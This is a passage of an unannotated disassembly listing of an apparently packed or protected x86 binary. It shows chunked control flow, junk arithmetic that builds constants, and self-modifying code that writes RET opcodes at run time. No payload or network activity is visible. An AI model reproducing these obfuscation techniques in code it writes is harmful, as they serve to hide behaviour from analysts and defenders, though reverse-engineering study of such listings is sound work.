; =============== S U B R O U T I N E =======================================
sub_459019 proc near ; CODE XREF: sub_44E8A5+13p
; FUNCTION CHUNK AT 0043BA7F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004407C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461F8 SIZE 00000008 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebx], eax
pop ebx
lea eax, nullsub_2
jmp loc_4407C6
sub_459019 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_45902B: ; CODE XREF: sub_43E68B+Cj
jz loc_451803
jmp loc_44C480
; END OF FUNCTION CHUNK FOR sub_43E68B
; =============== S U B R O U T I N E =======================================
sub_459036 proc near ; CODE XREF: sub_4423AE-1F32j
; sub_44EB88-D558p ...
push eax
push 0
push offset sub_43B7C7
jmp nullsub_372
sub_459036 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_459043 proc near ; CODE XREF: sub_44D79C:loc_440746j
retn
sub_459043 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_459044: ; CODE XREF: sub_459111:loc_4550CEj
xor eax, 132CF3D1h
add eax, 0EAA88D7Eh
call sub_43AED9
mov ds:off_41D014, eax
push offset loc_452D8D
jmp loc_43F79B
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_459065: ; CODE XREF: sub_43AA94+12F8Dj
jo sub_43BDD6
jmp loc_445988
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_459070 proc near ; DATA XREF: sub_44A3BB+3CE8o
; FUNCTION CHUNK AT 0043E4A3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043E723 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442434 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004437B8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D9E4 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045563B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004598C6 SIZE 00000009 BYTES
test dword ptr [eax], 0FFFF0000h
jnz loc_4440F7
jmp loc_43E723
sub_459070 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_459081 proc near ; DATA XREF: sub_4448D7+B6B9o
; FUNCTION CHUNK AT 00451653 SIZE 0000001A BYTES
push eax
push 3F5C89CDh
loc_459087: ; CODE XREF: ut7h7i2x:loc_4395DEj
pop eax
loc_459088: ; CODE XREF: ut7h7i2x:loc_45057Aj
sub eax, 658E8CAEh
js loc_451653
push ebp
pushf
jmp loc_451653
sub_459081 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44871F
loc_45909B: ; CODE XREF: sub_44871F+Bj
sbb esi, 0A93C8FB8h
; END OF FUNCTION CHUNK FOR sub_44871F
; START OF FUNCTION CHUNK FOR sub_45ADF0
loc_4590A1: ; CODE XREF: sub_45ADF0:loc_43C97Dj
call sub_445235
loc_4590A6: ; CODE XREF: ut7h7i2x:0043F2A8j
jmp loc_44C15F
; END OF FUNCTION CHUNK FOR sub_45ADF0
; ---------------------------------------------------------------------------
loc_4590AB: ; CODE XREF: ut7h7i2x:0043A151j
jmp loc_45423B
; ---------------------------------------------------------------------------
loc_4590B0: ; CODE XREF: ut7h7i2x:loc_44CF71j
add edi, 184025EDh
mov [edi], eax
pop edi
lea eax, nullsub_487
call sub_43E55D
; START OF FUNCTION CHUNK FOR sub_456B2D
loc_4590C4: ; CODE XREF: sub_456B2D+15j
jmp loc_457264
; END OF FUNCTION CHUNK FOR sub_456B2D
; ---------------------------------------------------------------------------
cdq
jmp sub_4598B4
; =============== S U B R O U T I N E =======================================
sub_4590CF proc near ; CODE XREF: ut7h7i2x:0044119Fj
; ut7h7i2x:loc_45655Ep
; FUNCTION CHUNK AT 00444347 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B932 SIZE 00000013 BYTES
xchg esi, [esp+0]
pop esi
push 0E1B11ED7h
pop eax
or eax, 73C6810Dh
jmp loc_444347
sub_4590CF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_4590E4: ; CODE XREF: sub_43E6CC+132EFj
jge loc_439546
loc_4590EA: ; CODE XREF: sub_4557A5+9j
jmp loc_43AA87
; END OF FUNCTION CHUNK FOR sub_43E6CC
; ---------------------------------------------------------------------------
or esi, 978E11BBh
adc esi, edi
js loc_459DC1
jmp loc_439541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_459102: ; CODE XREF: sub_4489DF+6763j
pop ecx
lea eax, loc_44C12F
mov byte ptr [eax], 0C3h
jmp loc_441159
; END OF FUNCTION CHUNK FOR sub_4489DF
; =============== S U B R O U T I N E =======================================
sub_459111 proc near ; CODE XREF: sub_41A456+Cp
; sub_443CC8+9j
; DATA XREF: ...
; FUNCTION CHUNK AT 0043C344 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043EBBF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F79B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004417F6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044686B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447BAB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004488D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004550C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455317 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457A8E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00459044 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00459C53 SIZE 0000000B BYTES
call sub_443CC8
loc_459116: ; CODE XREF: ut7h7i2x:004591BEj
jmp loc_4488D0
sub_459111 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_45911B: ; CODE XREF: sub_43AB62+AFCBj
jmp loc_44F28D
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_459120: ; CODE XREF: sub_44DB48-E5BCj
jmp loc_445063
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_459125: ; CODE XREF: sub_43CAF4-2853j
jmp loc_45179E
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_45912A: ; CODE XREF: ut7h7i2x:0043FE98j
mov ebx, ebp
push offset loc_44FAAE
jmp locret_43BBE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A907
loc_459136: ; CODE XREF: sub_45A907+12j
sub edx, 0BC718582h
add edx, 0A88EAA71h
xchg edx, [esp+0]
jmp sub_449D3B
; END OF FUNCTION CHUNK FOR sub_45A907
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_548. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45914B: ; CODE XREF: ut7h7i2x:004442F9j
jmp loc_439901
; ---------------------------------------------------------------------------
loc_459150: ; CODE XREF: ut7h7i2x:loc_451402j
push 0BFCA2C9Dh
jg loc_447CDA
or esi, 734AD89Bh
jmp loc_447A35
; ---------------------------------------------------------------------------
loc_459166: ; CODE XREF: ut7h7i2x:0044F78Aj
or eax, edi
xchg eax, [edx]
jmp loc_458C5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_45916F: ; CODE XREF: sub_455E0B:loc_44851Cj
push 0AA1BB6Dh
pop esi
xor esi, 6B680336h
rol esi, 9
add esi, 48A8C86Bh
or esi, 0FDAF4B67h
jmp loc_45421D
; END OF FUNCTION CHUNK FOR sub_455E0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4555CE
loc_45918F: ; CODE XREF: sub_4555CE:loc_448522j
not esi
mov ecx, 0A9C11BBFh
jmp loc_4537FE
; END OF FUNCTION CHUNK FOR sub_4555CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44640F
loc_45919B: ; CODE XREF: sub_44640F+1C08j
and edi, 5D4C6043h
xor edi, 0F6F7F7C4h
xchg edi, [esp+4+var_4]
push 2
jmp loc_43EE47
; END OF FUNCTION CHUNK FOR sub_44640F
; ---------------------------------------------------------------------------
loc_4591B1: ; DATA XREF: sub_4454CF+6o
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43EBBA
jmp loc_459116
; ---------------------------------------------------------------------------
loc_4591C3: ; CODE XREF: ut7h7i2x:loc_459621j
jnz loc_44291C
jmp loc_4504AA
; ---------------------------------------------------------------------------
loc_4591CE: ; CODE XREF: ut7h7i2x:loc_45961Cj
test al, al
jz loc_44D7EA
jmp loc_4572BD
; ---------------------------------------------------------------------------
mov ds:off_41D1F0, eax
lea eax, sub_4482D0
mov byte ptr [eax], 0C3h
jmp sub_4482D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4482D0
loc_4591EF: ; CODE XREF: sub_4482D0j
xchg ecx, [esp+0]
push ecx
pop edx
pop ecx
jmp loc_450F7D
; END OF FUNCTION CHUNK FOR sub_4482D0
; =============== S U B R O U T I N E =======================================
sub_4591FA proc near ; DATA XREF: ut7h7i2x:0044E760o
push ebx
push 0C47CF2D7h
pop ebx
sub_4591FA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_448321
loc_459201: ; CODE XREF: sub_448321:loc_450994j
xor ebx, 0F59910EDh
sub ebx, 9E490BECh
test ebx, 1000000h
jmp loc_43E38D
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_459218: ; CODE XREF: sub_45341C:loc_441C5Aj
pop edi
mov eax, [ebp-4]
mov al, [eax]
jb loc_4412A8
jmp loc_4410AD
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ED59
loc_459229: ; CODE XREF: sub_43ED59+6j
pop ecx
and ecx, 9D3E3352h
add ecx, 941D465Bh
or ecx, 4E90C626h
rol ecx, 0Eh
add ecx, 86590F88h
jmp loc_44EF4D
; END OF FUNCTION CHUNK FOR sub_43ED59
; ---------------------------------------------------------------------------
loc_45924A: ; CODE XREF: ut7h7i2x:loc_443DF2j
add edx, 840E67E8h
or edx, ds:4000F5h
add edx, 2D761082h
call sub_44ED9F
jmp loc_448147
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457453
loc_459266: ; CODE XREF: sub_457453:loc_4578D9j
xchg ecx, [esp+0]
mov ebp, ecx
pop ecx
push 0BA6BFFE6h
pop eax
and eax, 1D23FBCDh
jmp loc_4596AF
; END OF FUNCTION CHUNK FOR sub_457453
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_45927D: ; CODE XREF: sub_43A556+1B4DCj
add eax, 0CCD8B37h
jnz loc_448451
loc_459289: ; CODE XREF: sub_43C1E5+5DB8j
jmp loc_43BACD
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
popf
push ebp
mov esi, 0AA827FD3h
sub ebp, 136DEB09h
jmp loc_448450
; ---------------------------------------------------------------------------
mov eax, 78BDA40Ah
push edx
push 0D55E6DACh
pop edx
sub edx, 32175BB8h
xor edx, 0FC575E63h
rol edx, 8
sub edx, 8EE80104h
jmp loc_456C75
; ---------------------------------------------------------------------------
loc_4592C6: ; CODE XREF: ut7h7i2x:loc_43D832j
jnz loc_45457B
loc_4592CC: ; CODE XREF: ut7h7i2x:00441BE9j
jmp loc_44F878
; ---------------------------------------------------------------------------
and edx, 0F858F19h
push ecx
pop edx
mov esi, 1CB26910h
pop ecx
jmp loc_45457B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455383
loc_4592E4: ; CODE XREF: sub_455383+12j
and ecx, 34F239BFh
rol ecx, 1Dh
xor ecx, 0CAB37853h
test ecx, 1000000h
jmp loc_43F796
; END OF FUNCTION CHUNK FOR sub_455383
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_4592FE: ; CODE XREF: sub_43AB62+6j
; sub_43AB62+2FBAj ...
jmp loc_4440B9
; ---------------------------------------------------------------------------
loc_459303: ; CODE XREF: sub_43AB62+1C8j
; sub_4555CE-1DCAj
xchg edx, [esp-4+arg_0]
call sub_44A2A0
loc_45930B: ; CODE XREF: ut7h7i2x:0044DC6Dj
jo loc_4507C1
sub al, 99h
mov edx, [ebp-4]
loc_459316: ; CODE XREF: ut7h7i2x:loc_455E54j
push offset sub_44E6B4
jmp nullsub_378
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_459320: ; CODE XREF: sub_44BDF1:loc_445178j
push offset sub_44EFD1
loc_459325: ; CODE XREF: ut7h7i2x:loc_44DBB0j
jmp loc_44F4C2
; END OF FUNCTION CHUNK FOR sub_44BDF1
; =============== S U B R O U T I N E =======================================
sub_45932A proc near ; DATA XREF: ut7h7i2x:00443966o
mov ds:dword_41D104, eax
lea eax, nullsub_487
mov byte ptr [eax], 0C3h
jmp nullsub_487
sub_45932A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C6B4
loc_45933E: ; CODE XREF: sub_44C6B4+1j
mov eax, [esp+0]
push eax
mov eax, edx
xchg eax, [esp+4+var_4]
jmp loc_43BCF5
; END OF FUNCTION CHUNK FOR sub_44C6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_45934C: ; CODE XREF: sub_45A32D-1B748j
jl loc_43D80A
sbb ecx, 2F3F311Fh
jmp loc_43D800
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_45935D: ; CODE XREF: sub_44BF76:loc_43EC7Ej
or eax, 0A56599E6h
xor eax, 67C47072h
add eax, ebp
add eax, 274E326Fh
jmp loc_451CEB
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_459376: ; CODE XREF: sub_442B3B:loc_442FF3j
sub esi, 0A02D6868h
jns loc_444F68
sub edx, 2AAC5209h
jmp loc_443F4A
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_45938D: ; CODE XREF: ut7h7i2x:00440059j
mov byte ptr [eax], 0C3h
jmp sub_456EE0
; =============== S U B R O U T I N E =======================================
sub_459395 proc near ; CODE XREF: sub_414887+1Cp
; sub_41BBD8+161p ...
call sub_4593AA
jmp ds:off_41D090
sub_459395 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_4593A0: ; CODE XREF: sub_43FF65+1ACB8j
jmp loc_453CB3
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_4593A5: ; CODE XREF: ut7h7i2x:0043B274j
jmp loc_457549
; =============== S U B R O U T I N E =======================================
sub_4593AA proc near ; CODE XREF: ut7h7i2x:loc_44687Cj
; sub_43AB62:loc_44AB5Ej ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043CB5A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00455AAA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004578D3 SIZE 00000006 BYTES
jnz loc_43CB5A
xchg ebx, [esp+0]
jmp loc_454341
sub_4593AA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
loc_4593B8: ; CODE XREF: sub_446320+1D94j
; sub_43EB8A:loc_44F8D1j
rol eax, 3
push ecx
push 26BEEAC8h
loc_4593C1: ; CODE XREF: sub_443BC5:loc_445106j
pop ecx
sub ecx, 0EDADB40Bh
add ecx, 0A31026DEh
jmp loc_45745F
; END OF FUNCTION CHUNK FOR sub_43EB8A
; =============== S U B R O U T I N E =======================================
sub_4593D3 proc near ; CODE XREF: ut7h7i2x:0044A8DEj
; sub_449E96+3324p
; FUNCTION CHUNK AT 0044EEFE SIZE 00000014 BYTES
xchg edx, [esp+0]
pop edx
push 79A040FBh
xchg edx, [esp+0]
jmp loc_44EEFE
sub_4593D3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B4E3
loc_4593E4: ; CODE XREF: sub_43B4E3+20j
add edx, ebp
push edi
push 0B3D75C47h
pop edi
and edi, 0E2FAA8B5h
rol edi, 9
add edi, 0FE6EA48Ch
jmp loc_4532F6
; END OF FUNCTION CHUNK FOR sub_43B4E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_459401: ; CODE XREF: sub_4519D2-13FC5j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_44509D
call sub_45941F
jnz loc_44509D
mov eax, ebx
jmp loc_44509F
; END OF FUNCTION CHUNK FOR sub_4519D2
; =============== S U B R O U T I N E =======================================
sub_45941F proc near ; CODE XREF: sub_4550FF-1B736p
; sub_44B122-D736p ...
; FUNCTION CHUNK AT 004457D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B871 SIZE 0000000A BYTES
mov eax, [ebx+ecx]
jmp loc_4457D6
sub_45941F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44715B
loc_459427: ; CODE XREF: sub_44715B:loc_43C246j
push offset sub_4565F6
jmp nullsub_379
; END OF FUNCTION CHUNK FOR sub_44715B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CDC
loc_459431: ; CODE XREF: sub_448CDC:loc_44EE23j
push 7DC19290h
pop edi
xor edi, 0C7452A91h
add edi, 36588377h
and edi, 0AAD0FC71h
jmp loc_43B093
; END OF FUNCTION CHUNK FOR sub_448CDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B8A
loc_45944E: ; CODE XREF: sub_440B8A+5FF7j
push eax
jmp loc_451D55
; END OF FUNCTION CHUNK FOR sub_440B8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_459454: ; CODE XREF: sub_44E2C4j
mov eax, ds:dword_443780
or eax, eax
jnz loc_445734
jmp loc_4566E5
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
locret_459467: ; CODE XREF: ut7h7i2x:00455842j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_459468: ; CODE XREF: sub_444273+4C87j
test eax, esi
jmp loc_44872F
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
jmp ds:dword_41D134
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
dw 0CF80h
dd 5AFFFF4Fh, 5224048Bh, 0FF54F7E9h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_459485 proc near ; DATA XREF: sub_44DB1E:loc_4473A2o
; FUNCTION CHUNK AT 0044336B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446359 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447FF1 SIZE 00000005 BYTES
add esp, 0FFFFFED0h
push ebx
push 0CBD1B18Eh
pop ebx
add ebx, 2016C4F8h
and ebx, 553B6A67h
rol ebx, 1Eh
jmp loc_447FF1
sub_459485 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_4594A6: ; CODE XREF: sub_459E54:loc_4566B4j
test edx, 20h
jmp loc_44CD36
; END OF FUNCTION CHUNK FOR sub_459E54
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447E29
loc_4594B2: ; CODE XREF: sub_447E29+1210j
jmp nullsub_381
; END OF FUNCTION CHUNK FOR sub_447E29
; =============== S U B R O U T I N E =======================================
sub_4594B7 proc near ; CODE XREF: sub_43CAF4-2858p
; ut7h7i2x:0043AB29p ...
; FUNCTION CHUNK AT 004405CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004540F7 SIZE 00000002 BYTES
call sub_43CCC3
loc_4594BC: ; CODE XREF: ut7h7i2x:0044C6D0j
jb nullsub_382
loc_4594C2: ; CODE XREF: sub_44445F:loc_456B93j
sub esi, 3AB425DDh
add esi, 1F7B9D79h
mov [esi], eax
xchg edx, [esp+0]
mov esi, edx
jmp loc_4405CC
sub_4594B7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4594DA proc near ; CODE XREF: sub_4518D7-16719p
; ut7h7i2x:0044F548j
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
push offset loc_459631
jmp nullsub_383
sub_4594DA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5B0
loc_4594EB: ; CODE XREF: sub_43B5B0+1AAE5j
pop edi
rol edi, 2
xor edi, 0B2994F43h
add edi, 0A8808B54h
xchg edi, [esp+0]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_43B5B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_459503: ; CODE XREF: sub_44CAB9-E5D9j
pop ecx
add edi, 0DAFE933Ah
rol edi, 1Bh
or edi, 6C327CFEh
push offset sub_45864F
jmp nullsub_419
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_45951D: ; CODE XREF: sub_44F495:loc_447640j
; sub_44F495-3232j
push 7B024018h
pop eax
and eax, 9ABC601Fh
xor eax, 0F3B0ACA3h
loc_45952F: ; CODE XREF: ut7h7i2x:004502DFj
and eax, 9C70AE71h
jmp loc_44D0FF
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_45953A: ; CODE XREF: sub_457AEF:loc_43F9A5j
xor eax, edi
pop edi
jz loc_44335C
sub eax, 0E41F5103h
mov edx, [esp-8+arg_4]
push ebp
mov ebp, eax
jmp loc_43FD4D
; END OF FUNCTION CHUNK FOR sub_457AEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_459554: ; CODE XREF: sub_43DBEC:loc_43B063j
jz loc_43A6EF
jmp loc_4438D0
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_45955F: ; CODE XREF: ut7h7i2x:0043F107j
ja loc_453F85
loc_459565: ; CODE XREF: ut7h7i2x:loc_456229j
push 73D7A6A1h
pop eax
rol eax, 7
jmp loc_440193
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_482. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459FAF
loc_459574: ; CODE XREF: sub_459FAF+Bj
jmp loc_43E5A9
; END OF FUNCTION CHUNK FOR sub_459FAF
; ---------------------------------------------------------------------------
sbb esi, 7A0D69EBh
jmp loc_43F194
; =============== S U B R O U T I N E =======================================
sub_459584 proc near ; CODE XREF: sub_403209+BEp
; sub_404A3E+D9p ...
call sub_452D1F
loc_459589: ; CODE XREF: sub_43AE1A+53A2j
jmp sub_4594B7
sub_459584 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452EED
loc_45958E: ; CODE XREF: sub_452EED:loc_44269Cj
mov ds:off_41D1E8, eax
lea eax, loc_44A648
mov byte ptr [eax], 0C3h
jmp loc_44A648
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_4595A2: ; CODE XREF: sub_444A4D:loc_44A648j
pop edx
mov eax, [esp-4+arg_0]
push ebp
mov ebp, edx
xchg ebp, [esp+0]
jmp loc_457ABC
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4595B1: ; CODE XREF: sub_4459EE:loc_4450CCj
jnz loc_4429E3
jmp loc_4418E7
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
loc_4595BC: ; CODE XREF: ut7h7i2x:00441D0Dj
mov ebx, edx
; =============== S U B R O U T I N E =======================================
sub_4595BE proc near ; CODE XREF: ut7h7i2x:00444DBCp
; FUNCTION CHUNK AT 00445EEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448304 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004503C9 SIZE 00000026 BYTES
xchg ebx, [esp+0]
pop ebx
push edi
push 15A78B32h
pop edi
jmp loc_4503C9
sub_4595BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4595CE: ; CODE XREF: sub_4462B0+Ej
jnz loc_43BA03
jmp loc_448827
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_4595D9: ; CODE XREF: sub_455060:loc_459A53j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_44B519
jmp loc_448863
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
loc_4595ED: ; CODE XREF: ut7h7i2x:00455974j
xor eax, 9A6DBF63h
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4595F3: ; CODE XREF: sub_4462B0:loc_453D4Aj
add ebp, 0AE287AF0h
jmp loc_442A74
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_4595FE: ; CODE XREF: sub_444A12+Ej
; sub_444A12+76FAj ...
ror eax, 1Bh
; END OF FUNCTION CHUNK FOR sub_444A12
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_459601: ; CODE XREF: sub_43F7A5:loc_43A64Aj
jns loc_440EE8
xor eax, 0C6B61766h
call sub_43F66D
loc_459612: ; CODE XREF: sub_4431FF+A905j
jmp loc_443527
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_459617: ; CODE XREF: sub_448321-81B6j
jmp loc_43B47E
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_45961C: ; CODE XREF: ut7h7i2x:0043FA4Bj
jmp loc_4591CE
; ---------------------------------------------------------------------------
loc_459621: ; CODE XREF: ut7h7i2x:0043DCD9j
jmp loc_4591C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441924
loc_459626: ; CODE XREF: sub_441924+10j
test ecx, 200h
jmp loc_457DF7
; END OF FUNCTION CHUNK FOR sub_441924
; ---------------------------------------------------------------------------
loc_459631: ; DATA XREF: sub_4594DA+7o
push 56246214h
pop ebx
and ebx, 950C0F06h
sub ebx, 9E38BF71h
and ebx, 7EF549FDh
call sub_448789
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_45964E: ; CODE XREF: sub_43B9B1+CEFCj
jmp loc_4539BE
; END OF FUNCTION CHUNK FOR sub_43B9B1
; =============== S U B R O U T I N E =======================================
sub_459653 proc near ; CODE XREF: sub_43B34F+6p
; ut7h7i2x:004421E5j
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00439226 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00441956 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442CDC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B221 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044E197 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452122 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004554F1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456501 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459907 SIZE 0000000E BYTES
xchg edi, [esp-4+arg_0]
pop edi
mov eax, [ebp-18h]
shl eax, 2
loc_45965D: ; CODE XREF: ut7h7i2x:loc_444D8Cj
cdq
add eax, [esp+0]
jmp loc_44E197
sub_459653 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_459666: ; CODE XREF: ut7h7i2x:loc_4526FEj
; ut7h7i2x:00452716j
and edi, 8B1860EFh
xor edi, 437155EBh
call sub_4432F5
; START OF FUNCTION CHUNK FOR sub_444273
loc_459677: ; CODE XREF: sub_444273+6j
jmp loc_451A33
; END OF FUNCTION CHUNK FOR sub_444273
; =============== S U B R O U T I N E =======================================
sub_45967C proc near ; CODE XREF: sub_459E7A:loc_445973p
; ut7h7i2x:0044FB86j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043ABB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BB42 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D950 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F7B0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441A43 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442343 SIZE 00000019 BYTES
